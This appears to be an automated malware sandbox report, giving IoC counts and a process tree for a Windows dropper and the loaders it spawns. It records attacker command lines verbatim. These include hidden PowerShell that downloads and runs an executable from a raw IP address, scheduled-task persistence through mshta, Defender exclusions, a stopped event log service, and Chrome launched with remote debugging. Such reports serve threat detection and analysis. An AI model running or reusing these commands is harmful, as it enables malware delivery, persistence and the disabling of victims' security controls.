Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3772 powershell.exe Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 4260 powershell.exe Token: SeDebugPrivilege 3716 powershell.exe Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 5060 AhFKwnS.exe Token: SeDebugPrivilege 5396 AhFKwnS.exe Token: SeDebugPrivilege 5060 AhFKwnS.exe Token: SeDebugPrivilege 5396 AhFKwnS.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeShutdownPrivilege 5844 powercfg.exe Token: SeCreatePagefilePrivilege 5844 powercfg.exe Token: SeShutdownPrivilege 432 powercfg.exe Token: SeCreatePagefilePrivilege 432 powercfg.exe Token: SeShutdownPrivilege 4416 powercfg.exe Token: SeCreatePagefilePrivilege 4416 powercfg.exe Token: SeShutdownPrivilege 4216 powercfg.exe Token: SeCreatePagefilePrivilege 4216 powercfg.exe Token: SeDebugPrivilege 5744 powershell.exe Token: SeShutdownPrivilege 5324 powercfg.exe Token: SeCreatePagefilePrivilege 5324 powercfg.exe Token: SeShutdownPrivilege 4324 powercfg.exe Token: SeCreatePagefilePrivilege 4324 powercfg.exe Token: SeLockMemoryPrivilege 5544 explorer.exe Token: SeShutdownPrivilege 5908 powercfg.exe Token: SeCreatePagefilePrivilege 5908 powercfg.exe Token: SeShutdownPrivilege 4340 powercfg.exe Token: SeCreatePagefilePrivilege 4340 powercfg.exe Token: SeDebugPrivilege 1648 ce4pMzk.exe Token: SeDebugPrivilege 5896 chromium.exe Token: SeDebugPrivilege 5220 powershell.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe Token: SeCreatePagefilePrivilege 5836 chrome.exe Token: SeShutdownPrivilege 5836 chrome.exe -
Suspicious use of FindShellTrayWindow 29 IoCs
pid Process 4492 72beb2516b.exe 4492 72beb2516b.exe 4492 72beb2516b.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe 5836 chrome.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4492 72beb2516b.exe 4492 72beb2516b.exe 4492 72beb2516b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1532 wrote to memory of 5056 1532 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 89 PID 1532 wrote to memory of 5056 1532 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 89 PID 1532 wrote to memory of 5056 1532 899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe 89 PID 5056 wrote to memory of 4492 5056 rapes.exe 96 PID 5056 wrote to memory of 4492 5056 rapes.exe 96 PID 5056 wrote to memory of 4492 5056 rapes.exe 96 PID 4492 wrote to memory of 3656 4492 72beb2516b.exe 97 PID 4492 wrote to memory of 3656 4492 72beb2516b.exe 97 PID 4492 wrote to memory of 3656 4492 72beb2516b.exe 97 PID 4492 wrote to memory of 3572 4492 72beb2516b.exe 98 PID 4492 wrote to memory of 3572 4492 72beb2516b.exe 98 PID 4492 wrote to memory of 3572 4492 72beb2516b.exe 98 PID 3656 wrote to memory of 4976 3656 cmd.exe 100 PID 3656 wrote to memory of 4976 3656 cmd.exe 100 PID 3656 wrote to memory of 4976 3656 cmd.exe 100 PID 3572 wrote to memory of 3772 3572 mshta.exe 101 PID 3572 wrote to memory of 3772 3572 mshta.exe 101 PID 3572 wrote to memory of 3772 3572 mshta.exe 101 PID 5056 wrote to memory of 2636 5056 rapes.exe 106 PID 5056 wrote to memory of 2636 5056 rapes.exe 106 PID 5056 wrote to memory of 2636 5056 rapes.exe 106 PID 2636 wrote to memory of 2384 2636 cmd.exe 108 PID 2636 wrote to memory of 2384 2636 cmd.exe 108 PID 2636 wrote to memory of 2384 2636 cmd.exe 108 PID 3772 wrote to memory of 3024 3772 powershell.exe 109 PID 3772 wrote to memory of 3024 3772 powershell.exe 109 PID 3772 wrote to memory of 3024 3772 powershell.exe 109 PID 2636 wrote to memory of 4976 2636 cmd.exe 110 PID 2636 wrote to memory of 4976 2636 cmd.exe 110 PID 2636 wrote to memory of 4976 2636 cmd.exe 110 PID 4976 wrote to memory of 2992 4976 cmd.exe 111 PID 4976 wrote to memory of 2992 4976 cmd.exe 111 PID 4976 wrote to memory of 2992 4976 cmd.exe 111 PID 2636 wrote to memory of 2440 2636 cmd.exe 112 PID 2636 wrote to memory of 2440 2636 cmd.exe 112 PID 2636 wrote to memory of 2440 2636 cmd.exe 112 PID 2440 wrote to memory of 4260 2440 cmd.exe 113 PID 2440 wrote to memory of 4260 2440 cmd.exe 113 PID 2440 wrote to memory of 4260 2440 cmd.exe 113 PID 2636 wrote to memory of 2868 2636 cmd.exe 114 PID 2636 wrote to memory of 2868 2636 cmd.exe 114 PID 2636 wrote to memory of 2868 2636 cmd.exe 114 PID 2868 wrote to memory of 3716 2868 cmd.exe 115 PID 2868 wrote to memory of 3716 2868 cmd.exe 115 PID 2868 wrote to memory of 3716 2868 cmd.exe 115 PID 2636 wrote to memory of 1848 2636 cmd.exe 116 PID 2636 wrote to memory of 1848 2636 cmd.exe 116 PID 2636 wrote to memory of 1848 2636 cmd.exe 116 PID 2636 wrote to memory of 3712 2636 cmd.exe 123 PID 2636 wrote to memory of 3712 2636 cmd.exe 123 PID 2636 wrote to memory of 3712 2636 cmd.exe 123 PID 3712 wrote to memory of 2676 3712 mshta.exe 118 PID 3712 wrote to memory of 2676 3712 mshta.exe 118 PID 3712 wrote to memory of 2676 3712 mshta.exe 118 PID 5056 wrote to memory of 5060 5056 rapes.exe 120 PID 5056 wrote to memory of 5060 5056 rapes.exe 120 PID 5056 wrote to memory of 5060 5056 rapes.exe 120 PID 5056 wrote to memory of 5396 5056 rapes.exe 121 PID 5056 wrote to memory of 5396 5056 rapes.exe 121 PID 5056 wrote to memory of 5396 5056 rapes.exe 121 PID 2676 wrote to memory of 5412 2676 powershell.exe 122 PID 2676 wrote to memory of 5412 2676 powershell.exe 122 PID 2676 wrote to memory of 5412 2676 powershell.exe 122 PID 5060 wrote to memory of 3712 5060 AhFKwnS.exe 123
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe"C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\10105750101\72beb2516b.exe"C:\Users\Admin\AppData\Local\Temp\10105750101\72beb2516b.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 3ytCjmaP7PF /tr "mshta C:\Users\Admin\AppData\Local\Temp\i5xVSexML.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 3ytCjmaP7PF /tr "mshta C:\Users\Admin\AppData\Local\Temp\i5xVSexML.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4976
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\i5xVSexML.hta5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Users\Admin\AppData\Local\TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE"C:\Users\Admin\AppData\Local\TempMHZOE4XDLS0GPNXBZYRSK59AYWQ6MOYQ.EXE"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3024
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "a8c6AmasCQF" /tr "mshta \"C:\Temp\3UJ2l6pjZ.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1848
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\3UJ2l6pjZ.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5412
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5396
-
-
C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1956
-
-
C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:5772 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2416
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:5984
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "DWENDQPG"5⤵
- Launches sc.exe
PID:2588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"5⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:5872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "DWENDQPG"5⤵
- Launches sc.exe
PID:5752
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1212 -
C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 8005⤵
- Program crash
PID:5084
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5424 -
C:\Windows\Temp\{6AA8323E-2599-4D2A-BC63-537471B962B6}\.cr\Y87Oyyz.exe"C:\Windows\Temp\{6AA8323E-2599-4D2A-BC63-537471B962B6}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe" -burn.filehandle.attached=548 -burn.filehandle.self=6565⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5404 -
C:\Windows\Temp\{2D4460A7-044C-4791-807E-3DEA6402AE44}\.ba\SplashWin.exeC:\Windows\Temp\{2D4460A7-044C-4791-807E-3DEA6402AE44}\.ba\SplashWin.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4408 -
C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exeC:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exeC:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe9⤵
- Loads dropped DLL
PID:5632
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\7xmbMLPu\Anubis.exe""5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5220
-
-
-
C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5024 -
C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5812 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5836 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb739ecc40,0x7ffb739ecc4c,0x7ffb739ecc587⤵PID:2984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1860,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1848 /prefetch:27⤵PID:5348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:37⤵PID:2208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:87⤵PID:1296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3156 /prefetch:17⤵
- Uses browser remote debugging
PID:4164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3392,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3408 /prefetch:17⤵
- Uses browser remote debugging
PID:5644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3596,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4504 /prefetch:17⤵
- Uses browser remote debugging
PID:3572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:87⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4664,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:87⤵PID:5436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4624,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:87⤵PID:5080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:87⤵PID:5852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:87⤵PID:6136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4952 /prefetch:87⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4988 /prefetch:87⤵PID:5640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,5575457948512836158,3979967692668558413,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:87⤵PID:5436
-
-
